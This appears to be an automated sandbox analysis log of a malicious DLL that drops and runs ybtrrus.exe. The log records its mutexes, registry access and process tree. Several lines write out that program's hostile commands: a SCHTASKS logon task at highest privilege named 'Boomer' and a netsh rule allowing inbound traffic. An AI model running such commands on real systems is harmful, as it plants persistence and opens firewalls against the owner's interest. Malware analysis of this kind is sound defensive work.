Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C839A30	12_2_6C839A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C855B9C	12_2_6C855B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E7B50	12_2_6C7E7B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C73DB00	12_2_6C73DB00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84DB17	12_2_6C84DB17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C809480	12_2_6C809480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C819480	12_2_6C819480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A9560	12_2_6C6A9560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8055E0	12_2_6C8055E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C819670	12_2_6C819670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C83B7A0	12_2_6C83B7A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8597F0	12_2_6C8597F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C805080	12_2_6C805080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7810C0	12_2_6C7810C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8191D0	12_2_6C8191D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69D180	12_2_6C69D180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84F2F0	12_2_6C84F2F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C859250	12_2_6C859250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C847370	12_2_6C847370
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44FF0	28_2_6FE44FF0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE56750	28_2_6FE56750
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE49650	28_2_6FE49650
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE58D30	28_2_6FE58D30
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE504C0	28_2_6FE504C0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4F480	28_2_6FE4F480
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE45400	28_2_6FE45400
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE583E0	28_2_6FE583E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE543C0	28_2_6FE543C0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE503A4	28_2_6FE503A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50BA0	28_2_6FE50BA0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44BB0	28_2_6FE44BB0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50380	28_2_6FE50380
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44B20	28_2_6FE44B20
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE58A20	28_2_6FE58A20
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50200	28_2_6FE50200
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE411E0	28_2_6FE411E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE578E0	28_2_6FE578E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE598E0	28_2_6FE598E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4E87E	28_2_6FE4E87E
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE45850	28_2_6FE45850
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5D85C	28_2_6FE5D85C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545DB30	28_2_0545DB30
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A94EB8	28_2_06A94EB8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AD560C	28_2_06AD560C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06ACA410	28_2_06ACA410
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AF9460	28_2_06AF9460
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6C5B8	28_2_06A6C5B8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A63514	28_2_06A63514
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AC43A4	28_2_06AC43A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6C304	28_2_06A6C304
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06B07374	28_2_06B07374
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A7A0C8	28_2_06A7A0C8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE41E0	28_2_06AE41E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A65EA8	28_2_06A65EA8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6BEC4	28_2_06A6BEC4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A67CB4	28_2_06A67CB4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE3A2C	28_2_06AE3A2C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AC6A48	28_2_06AC6A48
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A69BBC	28_2_06A69BBC
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A84B8C	28_2_06A84B8C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A95B10	28_2_06A95B10
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A7A828	28_2_06A7A828
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE4844	28_2_06AE4844
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06B03924	28_2_06B03924
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3D134	28_2_05E3D134
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E299D0	28_2_05E299D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E261A8	28_2_05E261A8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E081BA	28_2_05E081BA
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3E16C	28_2_05E3E16C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E19900	28_2_05E19900
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E080A4	28_2_05E080A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A854	28_2_05E0A854
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A3C4	28_2_05E0A3C4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A768	28_2_05E0A768
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E24B74	28_2_05E24B74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0AB08	28_2_05E0AB08
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E15A78	28_2_05E15A78
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E2FA7C	28_2_05E2FA7C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3A31C	28_2_05E3A31C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3B660	28_2_05E3B660

Found potential string decryption / allocating functions

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: String function: 06A96AF8 appears 34 times
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: String function: 6FE5DE20 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85CB80 appears 160 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85C940 appears 156 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85C830 appears 212 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C84B7E0 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C849ED0 appears 31 times

One or more processes crash

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616

Uses 32bit PE files

Source: T8TY28UxiT.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: T8TY28UxiT.dll	Binary string: Afdfd\Device\Afd\Mio
Source: T8TY28UxiT.dll	Binary string: Failed to open \Device\Afd\Mio: 8

Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NumberCaseSig Value="False"/>.frm;.vb;*.vbp;.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: <Mask Value=".bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (.bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs@

Source: classification engine

Classification label: mal96.spyw.evad.winDLL@66/45@0/8

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE48830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,		28_2_6FE48830
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467AAE AdjustTokenPrivileges,		28_2_05467AAE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467D56 GetDiskFreeSpaceW,

28_2_05467D56

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467CFE FreeResource,

28_2_05467CFE

Source: C:\iDQiPwFWUp\ybtrrus.exe

File created: C:\Users\user\AppData\Roaming\Scooter Software

Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7732
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1c9c$432c4c
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7292
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7204
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1e34
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1d78
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7604
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7208
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8036
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1d88$432c4c
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7544
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1c7c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1e9c$432c4c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e1a9ee5b-b3ff-45ea-9647-c8dc25e5e75d

Jump to behavior

Source: Yara match	File source: 28.0.ybtrrus.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY

Source: T8TY28UxiT.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\iDQiPwFWUp\ybtrrus.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain

Source: T8TY28UxiT.dll

ReversingLabs: Detection: 15%

Source: ybtrrus.exe	String found in binary or memory: NATS-DANO-ADD
Source: ybtrrus.exe	String found in binary or memory: NATS-SEFI-ADD

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 544
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 660
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 608
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 656
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 608
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 672
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 684
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: unknown	Process created: C:\iDQiPwFWUp\ybtrrus.exe C:\iDQiPwFWUp\ybtrrus.exe
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: apphelp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mpr.dll
